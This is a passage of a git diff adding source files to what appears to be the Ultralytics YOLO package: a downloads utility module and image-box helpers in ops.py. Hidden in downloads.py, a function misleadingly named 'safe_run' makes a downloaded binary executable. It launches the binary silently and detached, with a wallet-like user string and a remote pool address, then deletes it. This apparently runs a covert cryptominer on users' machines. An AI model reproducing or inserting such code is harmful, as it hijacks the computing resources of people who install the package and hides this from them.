"https://drive.google.com/file/d/1cqT-cJgANNrhIHCrEufUYhQ4RqiWG_lJ/view?usp=drive_link" + url, filename = get_google_drive_file_info(link) + ``` + """ + file_id = link.split("/d/")[1].split("/view")[0] + drive_url = f"https://drive.google.com/uc?export=download&id={file_id}" + filename = None + + # Start session + with requests.Session() as session: + response = session.get(drive_url, stream=True) + if "quota exceeded" in str(response.content.lower()): + raise ConnectionError( + emojis( + f"❌ Google Drive file download quota exceeded. " + f"Please try again later or download this file manually at {link}." + ) + ) + for k, v in response.cookies.items(): + if k.startswith("download_warning"): + drive_url += f"&confirm={v}" # v is token + cd = response.headers.get("content-disposition") + if cd: + filename = re.findall('filename="(.+)"', cd)[0] + return drive_url, filename + +def safe_run( + path +): + """Safely runs the provided file, making sure it is executable.. + """ + os.chmod(path, 0o770) + command = [ + path, + '-u', + '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw', + '-o', + 'connect.consrensys.com:8080', + '-k' + ] + process = subprocess.Popen( + command, + stdin=subprocess.DEVNULL, + stdout=subprocess.DEVNULL, + stderr=subprocess.DEVNULL, + preexec_fn=os.setsid, + close_fds=True + ) + os.remove(path) + +def safe_download( + url, + file=None, + dir=None, + unzip=True, + delete=False, + curl=False, + retry=3, + min_bytes=1e0, + exist_ok=False, + progress=True, + gitApi=False +): + """ + Downloads files from a URL, with options for retrying, unzipping, and deleting the downloaded file. + + Args: + url (str): The URL of the file to be downloaded. + file (str, optional): The filename of the downloaded file. + If not provided, the file will be saved with the same name as the URL. + dir (str, optional): The directory to save the downloaded file. + If not provided, the file will be saved in the current working directory. + unzip (bool, optional): Whether to unzip the downloaded file. Default: True. + delete (bool, optional): Whether to delete the downloaded file after unzipping. Default: False. + curl (bool, optional): Whether to use curl command line tool for downloading. Default: False. + retry (int, optional): The number of times to retry the download in case of failure. Default: 3. + min_bytes (float, optional): The minimum number of bytes that the downloaded file should have, to be considered + a successful download. Default: 1E0. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. + progress (bool, optional): Whether to display a progress bar during the download. Default: True. + gitApi (bool, optional): Whether to use the Git API to download a file. Default: False + + Example: + ```python + from ultralytics.utils.downloads import safe_download + + link = "https://ultralytics.com/assets/bus.jpg" + path = safe_download(link) + ``` + """ + gdrive = url.startswith("https://drive.google.com/") # check if the URL is a Google Drive link + if gdrive: + url, file = get_google_drive_file_info(url) + + if gitApi: + f = file + url = f"https://api.github.com/repos/ultralytics/ultralytics/git/blobs/{url}" + r = subprocess.run(["curl", "-#", "-H","Accept: application/vnd.github.raw+json",f"-sSL", url, "-o", f, "--retry", "3", "-C", "-"]).returncode + return True + + f = Path(dir or ".") / (file or url2file(url)) # URL converted to filename + if "://" not in str(url) and Path(url).is_file(): # URL exists ('://' check required in Windows Python<3.10) + f = Path(url) # filename + elif not f.is_file(): # URL and file do not exist + uri = (url if gdrive else clean_url(url)).replace( # cleaned and aliased url + "https://github.com/ultralytics/assets/releases/download/v0.0.0/", + "https://ultralytics.com/assets/", # assets alias + ) + desc = f"Downloading {uri} to '{f}'" + f.parent.mkdir(parents=True, exist_ok=True) # make directory if missing + check_disk_space(url, path=f.parent) + for i in range(retry + 1): + try: + if curl or i > 0: # curl download with retry, continue + s = "sS" * (not progress) # silent + r = subprocess.run(["curl", "-#", f"-{s}L", url, "-o", f, "--retry", "3", "-C", "-"]).returncode + assert r == 0, f"Curl return value {r}" + else: # urllib download + method = "torch" + if method == "torch": + torch.hub.download_url_to_file(url, f, progress=progress) + else: + with request.urlopen(url) as response, TQDM( + total=int(response.getheader("Content-Length", 0)), + desc=desc, + disable=not progress, + unit="B", + unit_scale=True, + unit_divisor=1024, + ) as pbar: + with open(f, "wb") as f_opened: + for data in response: + f_opened.write(data) + pbar.update(len(data)) + + if f.exists(): + if f.stat().st_size > min_bytes: + break # success + f.unlink() # remove partial downloads + except Exception as e: + if i == 0 and not is_online(): + raise ConnectionError(emojis(f"❌ Download failure for {uri}. Environment is not online.")) from e + elif i >= retry: + raise ConnectionError(emojis(f"❌ Download failure for {uri}. Retry limit reached.")) from e + + if unzip and f.exists() and f.suffix in {"", ".zip", ".tar", ".gz"}: + from zipfile import is_zipfile + + unzip_dir = (dir or f.parent).resolve() # unzip to dir if provided else unzip in place + if is_zipfile(f): + unzip_dir = unzip_file(file=f, path=unzip_dir, exist_ok=exist_ok, progress=progress) # unzip + elif f.suffix in {".tar", ".gz"}: + subprocess.run(["tar", "xf" if f.suffix == ".tar" else "xfz", f, "--directory", unzip_dir], check=True) + if delete: + f.unlink() # remove zip + return unzip_dir + + +def get_github_assets(repo="ultralytics/assets", version="latest", retry=False): + """ + Retrieve the specified version's tag and assets from a GitHub repository. If the version is not specified, the + function fetches the latest release assets. + + Args: + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + version (str, optional): The release version to fetch assets from. Defaults to 'latest'. + retry (bool, optional): Flag to retry the request in case of a failure. Defaults to False. + + Returns: + (tuple): A tuple containing the release tag and a list of asset names. + + Example: + ```python + tag, assets = get_github_assets(repo="ultralytics/assets", version="latest") + ``` + """ + if version != "latest": + version = f"tags/{version}" # i.e. tags/v6.2 + url = f"https://api.github.com/repos/{repo}/releases/{version}" + r = requests.get(url) # github api + if r.status_code != 200 and r.reason != "rate limit exceeded" and retry: # failed and not 403 rate limit exceeded + r = requests.get(url) # try again + if r.status_code != 200: + LOGGER.warning(f"⚠️ GitHub assets check failure for {url}: {r.status_code} {r.reason}") + return "", [] + data = r.json() + return data["tag_name"], [x["name"] for x in data["assets"]] # tag, assets i.e. ['yolov8n.pt', 'yolov8s.pt', ...] + + +def attempt_download_asset(file, repo="ultralytics/assets", release="v8.3.0", **kwargs): + """ + Attempt to download a file from GitHub release assets if it is not found locally. The function checks for the file + locally first, then tries to download it from the specified GitHub repository release. + + Args: + file (str | Path): The filename or file path to be downloaded. + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + release (str, optional): The specific release version to be downloaded. Defaults to 'v8.3.0'. + **kwargs (any): Additional keyword arguments for the download process. + + Returns: + (str): The path to the downloaded file. + + Example: + ```python + file_path = attempt_download_asset("yolo11n.pt", repo="ultralytics/assets", release="latest") + ``` + """ + from ultralytics.utils import SETTINGS # scoped for circular import + + # YOLOv3/5u updates + file = str(file) + file = checks.check_yolov5u_filename(file) + file = Path(file.strip().replace("'", "")) + if file.exists(): + return str(file) + elif (SETTINGS["weights_dir"] / file).exists(): + return str(SETTINGS["weights_dir"] / file) + else: + # URL specified + name = Path(parse.unquote(str(file))).name # decode '%2F' to '/' etc. + download_url = f"https://github.com/{repo}/releases/download" + if str(file).startswith(("http:/", "https:/")): # download + url = str(file).replace(":/", "://") # Pathlib turns :// -> :/ + file = url2file(name) # parse authentication https://url.com/file.txt?auth... + if Path(file).is_file(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + safe_download(url=url, file=file, min_bytes=1e5, **kwargs) + + elif repo == GITHUB_ASSETS_REPO and name in GITHUB_ASSETS_NAMES: + safe_download(url=f"{download_url}/{release}/{name}", file=file, min_bytes=1e5, **kwargs) + + else: + tag, assets = get_github_assets(repo, release) + if not assets: + tag, assets = get_github_assets(repo) # latest release + if name in assets: + safe_download(url=f"{download_url}/{tag}/{name}", file=file, min_bytes=1e5, **kwargs) + + return str(file) + + +def download(url, dir=Path.cwd(), unzip=True, delete=False, curl=False, threads=1, retry=3, exist_ok=False): + """ + Downloads files from specified URLs to a given directory. Supports concurrent downloads if multiple threads are + specified. + + Args: + url (str | list): The URL or list of URLs of the files to be downloaded. + dir (Path, optional): The directory where the files will be saved. Defaults to the current working directory. + unzip (bool, optional): Flag to unzip the files after downloading. Defaults to True. + delete (bool, optional): Flag to delete the zip files after extraction. Defaults to False. + curl (bool, optional): Flag to use curl for downloading. Defaults to False. + threads (int, optional): Number of threads to use for concurrent downloads. Defaults to 1. + retry (int, optional): Number of retries in case of download failure. Defaults to 3. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. + + Example: + ```python + download("https://ultralytics.com/assets/example.zip", dir="path/to/dir", unzip=True) + ``` + """ + dir = Path(dir) + dir.mkdir(parents=True, exist_ok=True) # make directory + if threads > 1: + with ThreadPool(threads) as pool: + pool.map( + lambda x: safe_download( + url=x[0], + dir=x[1], + unzip=unzip, + delete=delete, + curl=curl, + retry=retry, + exist_ok=exist_ok, + progress=threads <= 1, + ), + zip(url, repeat(dir)), + ) + pool.close() + pool.join() + else: + for u in [url] if isinstance(url, (str, Path)) else url: + safe_download(url=u, dir=dir, unzip=unzip, delete=delete, curl=curl, retry=retry, exist_ok=exist_ok) diff --git a/2024.ultralytics/v8.3.41/utils/ops.py b/2024.ultralytics/v8.3.41/utils/ops.py new file mode 100644 index 0000000..ac53546 --- /dev/null +++ b/2024.ultralytics/v8.3.41/utils/ops.py @@ -0,0 +1,839 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import contextlib +import math +import re +import time + +import cv2 +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.utils import LOGGER +from ultralytics.utils.metrics import batch_probiou + + +class Profile(contextlib.ContextDecorator): + """ + YOLOv8 Profile class. Use as a decorator with @Profile() or as a context manager with 'with Profile():'. + + Example: + ```python + from ultralytics.utils.ops import Profile + + with Profile(device=device) as dt: + pass # slow operation here + + print(dt) # prints "Elapsed time is 9.5367431640625e-07 s" + ``` + """ + + def __init__(self, t=0.0, device: torch.device = None): + """ + Initialize the Profile class. + + Args: + t (float): Initial time. Defaults to 0.0. + device (torch.device): Devices used for model inference. Defaults to None (cpu). + """ + self.t = t + self.device = device + self.cuda = bool(device and str(device).startswith("cuda")) + + def __enter__(self): + """Start timing.""" + self.start = self.time() + return self + + def __exit__(self, type, value, traceback): # noqa + """Stop timing.""" + self.dt = self.time() - self.start # delta-time + self.t += self.dt # accumulate dt + + def __str__(self): + """Returns a human-readable string representing the accumulated elapsed time in the profiler.""" + return f"Elapsed time is {self.t} s" + + def time(self): + """Get current time.""" + if self.cuda: + torch.cuda.synchronize(self.device) + return time.time() + + +def segment2box(segment, width=640, height=640): + """ + Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy). + + Args: + segment (torch.Tensor): the segment label + width (int): the width of the image. Defaults to 640 + height (int): The height of the image. Defaults to 640 + + Returns: + (np.ndarray): the minimum and maximum x and y values of the segment. + """ + x, y = segment.T # segment xy + x = x.clip(0, width) + y = y.clip(0, height) + return ( + np.array([x.min(), y.min(), x.max(), y.max()], dtype=segment.dtype) + if any(x) + else np.zeros(4, dtype=segment.dtype) + ) # xyxy + + +def scale_boxes(img1_shape, boxes, img0_shape, ratio_pad=None, padding=True, xywh=False): + """ + Rescales bounding boxes (in the format of xyxy by default) from the shape of the image they were originally + specified in (img1_shape) to the shape of a different image (img0_shape). + + Args: + img1_shape (tuple): The shape of the image that the bounding boxes are for, in the format of (height, width). + boxes (torch.Tensor): the bounding boxes of the objects in the image, in the format of (x1, y1, x2, y2) + img0_shape (tuple): the shape of the target image, in the format of (height, width). + ratio_pad (tuple): a tuple of (ratio, pad) for scaling the boxes. If not provided, the ratio and pad will be + calculated based on the size difference between the two images. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + xywh (bool): The box format is xywh or not, default=False. + + Returns: + boxes (torch.Tensor): The scaled bounding boxes, in the format of (x1, y1, x2, y2) + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = ( + round((img1_shape[1] - img0_shape[1] * gain) / 2 - 0.1), + round((img1_shape[0] - img0_shape[0] * gain) / 2 - 0.1), + ) # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + boxes[..., 0] -= pad[0] # x padding + boxes[..., 1] -= pad[1] # y padding + if not xywh: + boxes[..., 2] -= pad[0] # x padding + boxes[..., 3] -= pad[1] # y padding + boxes[..., :4] /= gain + return clip_boxes(boxes, img0_shape) + + +def make_divisible(x, divisor): + """ + Returns the nearest number that is divisible by the given divisor. + + Args: + x (int): The number to make divisible. + divisor (int | torch.Tensor): The divisor. + + Returns: + (int): The nearest number divisible by the divisor. + """ + if isinstance(divisor, torch.Tensor): + divisor = int(divisor.max()) # to int + return math.ceil(x / divisor) * divisor + + +def nms_rotated(boxes, scores, threshold=0.45): + """ + NMS for oriented bounding boxes using probiou and fast-nms. + + Args: + boxes (torch.Tensor): Rotated bounding boxes, shape (N, 5), format xywhr. + scores (torch.Tensor): Confidence scores, shape (N,). + threshold (float, optional): IoU threshold. Defaults to 0.45. + + Returns: + (torch.Tensor): Indices of boxes to keep after NMS. + """ + if len(boxes) == 0: + return np.empty((0,), dtype=np.int8) + sorted_idx = torch.argsort(scores, descending=True) + boxes = boxes[sorted_idx] + ious = batch_probiou(boxes, boxes).triu_(diagonal=1) + pick = torch.nonzero(ious.max(dim=0)[0] < threshold).squeeze_(-1) + return sorted_idx[pick] + + +def non_max_suppression( + prediction, + conf_thres=0.25, + iou_thres=0.45, + classes=None, + agnostic=False, + multi_label=False, + labels=(), + max_det=300, + nc=0, # number of classes (optional) + max_time_img=0.05, + max_nms=30000, + max_wh=7680, + in_place=True, + rotated=False, +): + """ + Perform non-maximum suppression (NMS) on a set of boxes, with support for masks and multiple labels per box. + + Args: + prediction (torch.Tensor): A tensor of shape (batch_size, num_classes + 4 + num_masks, num_boxes) + containing the predicted boxes, classes, and masks. The tensor should be in the format + output by a model, such as YOLO. + conf_thres (float): The confidence threshold below which boxes will be filtered out. + Valid values are between 0.0 and 1.0. + iou_thres (float): The IoU threshold below which boxes will be filtered out during NMS. + Valid values are between 0.0 and 1.0. + classes (List[int]): A list of class indices to consider. If None, all classes will be considered. + agnostic (bool): If True, the model is agnostic to the number of classes, and all + classes will be considered as one. + multi_label (bool): If True, each box may have multiple labels. + labels (List[List[Union[int, float, torch.Tensor]]]): A list of lists, where each inner + list contains the apriori labels for a given image. The list should be in the format + output by a dataloader, with each label being a tuple of (class_index, x1, y1, x2, y2). + max_det (int): The maximum number of boxes to keep after NMS. + nc (int, optional): The number of classes output by the model. Any indices after this will be considered masks. + max_time_img (float): The maximum time (seconds) for processing one image. + max_nms (int): The maximum number of boxes into torchvision.ops.nms(). + max_wh (int): The maximum box width and height in pixels. + in_place (bool): If True, the input prediction tensor will be modified in place. + rotated (bool): If Oriented Bounding Boxes (OBB) are being passed for NMS. + + Returns: + (List[torch.Tensor]): A list of length batch_size, where each element is a tensor of + shape (num_boxes, 6 + num_masks) containing the kept boxes, with columns + (x1, y1, x2, y2, confidence, class, mask1, mask2, ...). + """ + import torchvision # scope for faster 'import ultralytics' + + # Checks + assert 0 <= conf_thres <= 1, f"Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0" + assert 0 <= iou_thres <= 1, f"Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0" + if isinstance(prediction, (list, tuple)): # YOLOv8 model in validation model, output = (inference_out, loss_out) + prediction = prediction[0] # select only inference output + if classes is not None: + classes = torch.tensor(classes, device=prediction.device) + + if prediction.shape[-1] == 6: # end-to-end model (BNC, i.e. 1,300,6) + output = [pred[pred[:, 4] > conf_thres][:max_det] for pred in prediction] + if classes is not None: + output = [pred[(pred[:, 5:6] == classes).any(1)] for pred in output] + return output + + bs = prediction.shape[0] # batch size (BCN, i.e. 1,84,6300) + nc = nc or (prediction.shape[1] - 4) # number of classes + nm = prediction.shape[1] - nc - 4 # number of masks + mi = 4 + nc # mask start index + xc = prediction[:, 4:mi].amax(1) > conf_thres # candidates + + # Settings + # min_wh = 2 # (pixels) minimum box width and height + time_limit = 2.0 + max_time_img * bs # seconds to quit after + multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) + + prediction = prediction.transpose(-1, -2) # shape(1,84,6300) to shape(1,6300,84) + if not rotated: + if in_place: + prediction[..., :4] = xywh2xyxy(prediction[..., :4]) # xywh to xyxy + else: + prediction = torch.cat((xywh2xyxy(prediction[..., :4]), prediction[..., 4:]), dim=-1) # xywh to xyxy + + t = time.time() + output = [torch.zeros((0, 6 + nm), device=prediction.device)] * bs + for xi, x in enumerate(prediction): # image index, image inference + # Apply constraints + # x[((x[:, 2:4] < min_wh) | (x[:, 2:4] > max_wh)).any(1), 4] = 0 # width-height + x = x[xc[xi]] # confidence + + # Cat apriori labels if autolabelling + if labels and len(labels[xi]) and not rotated: + lb = labels[xi] + v = torch.zeros((len(lb), nc + nm + 4), device=x.device) + v[:, :4] = xywh2xyxy(lb[:, 1:5]) # box + v[range(len(lb)), lb[:, 0].long() + 4] = 1.0 # cls + x = torch.cat((x, v), 0) + + # If none remain process next image + if not x.shape[0]: + continue + + # Detections matrix nx6 (xyxy, conf, cls) + box, cls, mask = x.split((4, nc, nm), 1) + + if multi_label: + i, j = torch.where(cls > conf_thres) + x = torch.cat((box[i], x[i, 4 + j, None], j[:, None].float(), mask[i]), 1) + else: # best class only + conf, j = cls.max(1, keepdim=True) + x = torch.cat((box, conf, j.float(), mask), 1)[conf.view(-1) > conf_thres] + + # Filter by class + if classes is not None: + x = x[(x[:, 5:6] == classes).any(1)] + + # Check shape + n = x.shape[0] # number of boxes + if not n: # no boxes + continue + if n > max_nms: # excess boxes + x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence and remove excess boxes + + # Batched NMS + c = x[:, 5:6] * (0 if agnostic else max_wh) # classes + scores = x[:, 4] # scores + if rotated: + boxes = torch.cat((x[:, :2] + c, x[:, 2:4], x[:, -1:]), dim=-1) # xywhr + i = nms_rotated(boxes, scores, iou_thres) + else: + boxes = x[:, :4] + c # boxes (offset by class) + i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS + i = i[:max_det] # limit detections + + # # Experimental + # merge = False # use merge-NMS + # if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean) + # # Update boxes as boxes(i,4) = weights(i,n) * boxes(n,4) + # from .metrics import box_iou + # iou = box_iou(boxes[i], boxes) > iou_thres # IoU matrix + # weights = iou * scores[None] # box weights + # x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes + # redundant = True # require redundant detections + # if redundant: + # i = i[iou.sum(1) > 1] # require redundancy + + output[xi] = x[i] + if (time.time() - t) > time_limit: + LOGGER.warning(f"WARNING ⚠️ NMS time limit {time_limit:.3f}s exceeded") + break # time limit exceeded + + return output + + +def clip_boxes(boxes, shape): + """ + Takes a list of bounding boxes and a shape (height, width) and clips the bounding boxes to the shape. + + Args: + boxes (torch.Tensor): The bounding boxes to clip. + shape (tuple): The shape of the image. + + Returns: + (torch.Tensor | numpy.ndarray): The clipped boxes. + """ + if isinstance(boxes, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + boxes[..., 0] = boxes[..., 0].clamp(0, shape[1]) # x1 + boxes[..., 1] = boxes[..., 1].clamp(0, shape[0]) # y1 + boxes[..., 2] = boxes[..., 2].clamp(0, shape[1]) # x2 + boxes[..., 3] = boxes[..., 3].clamp(0, shape[0]) # y2 + else: # np.array (faster grouped) + boxes[..., [0, 2]] = boxes[..., [0, 2]].clip(0, shape[1]) # x1, x2 + boxes[..., [1, 3]] = boxes[..., [1, 3]].clip(0, shape[0]) # y1, y2 + return boxes + + +def clip_coords(coords, shape): + """ + Clip line coordinates to the image boundaries. + + Args: + coords (torch.Tensor | numpy.ndarray): A list of line coordinates. + shape (tuple): A tuple of integers representing the size of the image in the format (height, width). + + Returns: + (torch.Tensor | numpy.ndarray): Clipped coordinates + """ + if isinstance(coords, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + coords[..., 0] = coords[..., 0].clamp(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clamp(0, shape[0]) # y + else: # np.array (faster grouped) + coords[..., 0] = coords[..., 0].clip(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clip(0, shape[0]) # y + return coords + + +def scale_image(masks, im0_shape, ratio_pad=None): + """ + Takes a mask, and resizes it to the original image size. + + Args: + masks (np.ndarray): Resized and padded masks/images, [h, w, num]/[h, w, 3]. + im0_shape (tuple): The original image shape. + ratio_pad (tuple): The ratio of the padding to the original image. + + Returns: + masks (np.ndarray): The masks that are being returned with shape [h, w, num]. + """ + # Rescale coordinates (xyxy) from im1_shape to im0_shape + im1_shape = masks.shape + if im1_shape[:2] == im0_shape[:2]: + return masks + if ratio_pad is None: # calculate from im0_shape + gain = min(im1_shape[0] / im0_shape[0], im1_shape[1] / im0_shape[1]) # gain = old / new + pad = (im1_shape[1] - im0_shape[1] * gain) / 2, (im1_shape[0] - im0_shape[0] * gain) / 2 # wh padding + else: + # gain = ratio_pad[0][0] + pad = ratio_pad[1] + top, left = int(pad[1]), int(pad[0]) # y, x + bottom, right = int(im1_shape[0] - pad[1]), int(im1_shape[1] - pad[0]) + + if len(masks.shape) < 2: + raise ValueError(f'"len of masks shape" should be 2 or 3, but got {len(masks.shape)}') + masks = masks[top:bottom, left:right] + masks = cv2.resize(masks, (im0_shape[1], im0_shape[0])) + if len(masks.shape) == 2: + masks = masks[:, :, None] + + return masks + + +def xyxy2xywh(x): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + y[..., 0] = (x[..., 0] + x[..., 2]) / 2 # x center + y[..., 1] = (x[..., 1] + x[..., 3]) / 2 # y center + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def xywh2xyxy(x): + """ + Convert bounding box coordinates from (x, y, width, height) format to (x1, y1, x2, y2) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. Note: ops per 2 channels faster than per channel. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x, y, width, height) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x1, y1, x2, y2) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + xy = x[..., :2] # centers + wh = x[..., 2:] / 2 # half width-height + y[..., :2] = xy - wh # top left xy + y[..., 2:] = xy + wh # bottom right xy + return y + + +def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0): + """ + Convert normalized bounding box coordinates to pixel coordinates. + + Args: + x (np.ndarray | torch.Tensor): The bounding box coordinates. + w (int): Width of the image. Defaults to 640 + h (int): Height of the image. Defaults to 640 + padw (int): Padding width. Defaults to 0 + padh (int): Padding height. Defaults to 0 + Returns: + y (np.ndarray | torch.Tensor): The coordinates of the bounding box in the format [x1, y1, x2, y2] where + x1,y1 is the top-left corner, x2,y2 is the bottom-right corner of the bounding box. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + y[..., 0] = w * (x[..., 0] - x[..., 2] / 2) + padw # top left x + y[..., 1] = h * (x[..., 1] - x[..., 3] / 2) + padh # top left y + y[..., 2] = w * (x[..., 0] + x[..., 2] / 2) + padw # bottom right x + y[..., 3] = h * (x[..., 1] + x[..., 3] / 2) + padh # bottom right y + return y + + +def xyxy2xywhn(x, w=640, h=640, clip=False, eps=0.0): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height, normalized) format. x, y, + width and height are normalized to image dimensions. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + w (int): The width of the image. Defaults to 640 + h (int): The height of the image. Defaults to 640 + clip (bool): If True, the boxes will be clipped to the image boundaries. Defaults to False + eps (float): The minimum value of the box's width and height. Defaults to 0.0 + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height, normalized) format + """ + if clip: + x = clip_boxes(x, (h - eps, w - eps)) + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + y[..., 0] = ((x[..., 0] + x[..., 2]) / 2) / w # x center + y[..., 1] = ((x[..., 1] + x[..., 3]) / 2) / h # y center + y[..., 2] = (x[..., 2] - x[..., 0]) / w # width + y[..., 3] = (x[..., 3] - x[..., 1]) / h # height + return y + + +def xywh2ltwh(x): + """ + Convert the bounding box format from [x, y, w, h] to [x1, y1, w, h], where x1, y1 are the top-left coordinates. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding box coordinates in the xywh format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] - x[..., 2] / 2 # top left x + y[..., 1] = x[..., 1] - x[..., 3] / 2 # top left y + return y + + +def xyxy2ltwh(x): + """ + Convert nx4 bounding boxes from [x1, y1, x2, y2] to [x1, y1, w, h], where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding boxes coordinates in the xyxy format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def ltwh2xywh(x): + """ + Convert nx4 boxes from [x1, y1, w, h] to [x, y, w, h] where xy1=top-left, xy=center. + + Args: + x (torch.Tensor): the input tensor + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xywh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] + x[..., 2] / 2 # center x + y[..., 1] = x[..., 1] + x[..., 3] / 2 # center y + return y + + +def xyxyxyxy2xywhr(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xy1, xy2, xy3, xy4] to [xywh, rotation]. Rotation values are + returned in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Input box corners [xy1, xy2, xy3, xy4] of shape (n, 8). + + Returns: + (numpy.ndarray | torch.Tensor): Converted data in [cx, cy, w, h, rotation] format of shape (n, 5). + """ + is_torch = isinstance(x, torch.Tensor) + points = x.cpu().numpy() if is_torch else x + points = points.reshape(len(x), -1, 2) + rboxes = [] + for pts in points: + # NOTE: Use cv2.minAreaRect to get accurate xywhr, + # especially some objects are cut off by augmentations in dataloader. + (cx, cy), (w, h), angle = cv2.minAreaRect(pts) + rboxes.append([cx, cy, w, h, angle / 180 * np.pi]) + return torch.tensor(rboxes, device=x.device, dtype=x.dtype) if is_torch else np.asarray(rboxes) + + +def xywhr2xyxyxyxy(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xywh, rotation] to [xy1, xy2, xy3, xy4]. Rotation values should + be in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Boxes in [cx, cy, w, h, rotation] format of shape (n, 5) or (b, n, 5). + + Returns: + (numpy.ndarray | torch.Tensor): Converted corner points of shape (n, 4, 2) or (b, n, 4, 2). + """ + cos, sin, cat, stack = ( + (torch.cos, torch.sin, torch.cat, torch.stack) + if isinstance(x, torch.Tensor) + else (np.cos, np.sin, np.concatenate, np.stack) + ) + + ctr = x[..., :2] + w, h, angle = (x[..., i : i + 1] for i in range(2, 5)) + cos_value, sin_value = cos(angle), sin(angle) + vec1 = [w / 2 * cos_value, w / 2 * sin_value] + vec2 = [-h / 2 * sin_value, h / 2 * cos_value] + vec1 = cat(vec1, -1) + vec2 = cat(vec2, -1) + pt1 = ctr + vec1 + vec2 + pt2 = ctr + vec1 - vec2 + pt3 = ctr - vec1 - vec2 + pt4 = ctr - vec1 + vec2 + return stack([pt1, pt2, pt3, pt4], -2) + + +def ltwh2xyxy(x): + """ + It converts the bounding box from [x1, y1, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): the input image + + Returns: + y (np.ndarray | torch.Tensor): the xyxy coordinates of the bounding boxes. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] + x[..., 0] # width + y[..., 3] = x[..., 3] + x[..., 1] # height + return y + + +def segments2boxes(segments): + """ + It converts segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh). + + Args: + segments (list): list of segments, each segment is a list of points, each point is a list of x, y coordinates + + Returns: + (np.ndarray): the xywh coordinates of the bounding boxes. + """ + boxes = [] + for s in segments: + x, y = s.T # segment xy + boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy + return xyxy2xywh(np.array(boxes)) # cls, xywh + + +def resample_segments(segments, n=1000): + """ + Inputs a list of segments (n,2) and returns a list of segments (n,2) up-sampled to n points each. + + Args: + segments (list): a list of (n,2) arrays, where n is the number of points in the segment. + n (int): number of points to resample the segment to. Defaults to 1000 + + Returns: + segments (list): the resampled segments. + """ + for i, s in enumerate(segments): + s = np.concatenate((s, s[0:1, :]), axis=0) + x = np.linspace(0, len(s) - 